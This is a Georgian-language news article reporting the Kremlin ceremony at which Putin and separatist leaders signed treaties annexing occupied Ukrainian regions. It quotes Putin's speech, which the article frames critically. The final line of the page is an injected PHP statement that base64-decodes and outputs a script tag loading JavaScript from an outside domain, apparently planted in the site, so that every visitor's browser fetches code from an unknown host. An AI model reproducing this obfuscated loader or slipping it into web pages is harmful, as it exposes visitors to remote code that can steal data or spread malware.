celsiusi
ავერსი შნაიდერი
კრემლში ვლადიმერ პუტინმა და სეპარატისტმა ლიდერებმა უკრაინის ოკუპირებული ტერიტორიების რუსეთის შემადგენლობაში შესვლის შესახებ „შეთანხმებებს“ ხელი მოაწერეს. არსებული ინფორმაციით, ეს უკრაინის ტერიტორიის 15%-ს შეადგენს.
 
"მოგეხსენებათ, დონეცკისა და ლუგანსკის სახალხო რესპუბლიკებში, ზაპოროჟიესა და ხერსონის ოლქებში, რეფერენდუმები ჩატარდა. მათი შედეგები შეჯამდა, შედეგები ცნობილია. ხალხმა გააკეთა თავისი არჩევანი, მკაფიო არჩევანი. დღეს ჩვენ ვაფორმებთ ხელშეკრულებებს დონეცკის სახალხო რესპუბლიკის, ლუგანსკის სახალხო რესპუბლიკის, ზაპოროჟიეს და ხერსონის ოლქის რუსეთში მიღების შესახებ. დარწმუნებული ვარ, რომ ფედერალური ასამბლეა მხარს დაუჭერს კონსტიტუციურ კანონებს რუსეთში ოთხი ახალი რეგიონის, რუსეთის ფედერაციის ოთხი ახალი სუბიექტის მიღებისა და ჩამოყალიბების შესახებ, რადგან ეს მილიონობით ადამიანის ნებაა. მინდა, მომისმინოს კიევის ხელისუფლებამ და მისმა რეალურმა პატრონებმა დასავლეთში. ყველამ დაიმახსოვროს – ლუგანსკში, დონეცკში, ხერსონსა და ზაპოროჟიეში მცხოვრები ადამიანები ხდებიან ჩვენი მოქალაქეები სამუდამოდ. მოვუწოდებთ კიევის რეჟიმს, დაუყოვნებლივ შეწყვიტოს ცეცხლი, ყველა საბრძოლო მოქმედება, ის ომი, რომელიც მან ჯერ კიდევ 2014 წელს გააჩაღა, და დაუბრუნდეს მოლაპარაკებების მაგიდას. ჩვენ ამისთვის მზად ვართ. ეს არაერთხელ ითქვა, თუმცა დონეცკში, ლუგანსკში, ზაპოროჟიეში, ხერსონში ხალხის არჩევანს არ განვიხილავთ. ეს არჩევანი გაკეთდა და რუსეთი მას არ უღალატებს. კიევის დღევანდელი ხელისუფლება პატივისცემით უნდა მოეპყროს ხალხის ნების ამ გამოხატვას. მხოლოდ ასეთი შეიძლება იყოს გზა მშვიდობისკენ. ჩვენ დავიცავთ ჩვენს მიწას ჩვენს ხელთ არსებული ყველა ძალით და საშუალებით, ყველაფერს გავაკეთებთ, რომ უზრუნველვყოთ ჩვენი ხალხის უსაფრთხო ცხოვრება. ამაშია ჩვენი ხალხის დიდი განმათავისუფლებელი მისია."– თქვა პუტინმა.
 
პუტინთან ერთად, ე.წ. შეთანხმებების ხელმოწერის ცერემონიაში მონაწილეობდნენ თვითგამოცხადებული დონეცკის სახალხო რესპუბლიკის ლიდერი დენის პუშილინი, თვითგამოცხადებული ლუგანსკის სახალხო რესპუბლიკის ლიდერი ლეონიდ პასეჩნიკი, ოკუპირებული ზაპოროჟიეს ოლქის სეპარატისტი ლიდერი ევგენი ბალიცკი, ოკუპირებული ხერსონის ოლქის სეპარატისტი ლიდერი ვლადიმირ სალდო.
 
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");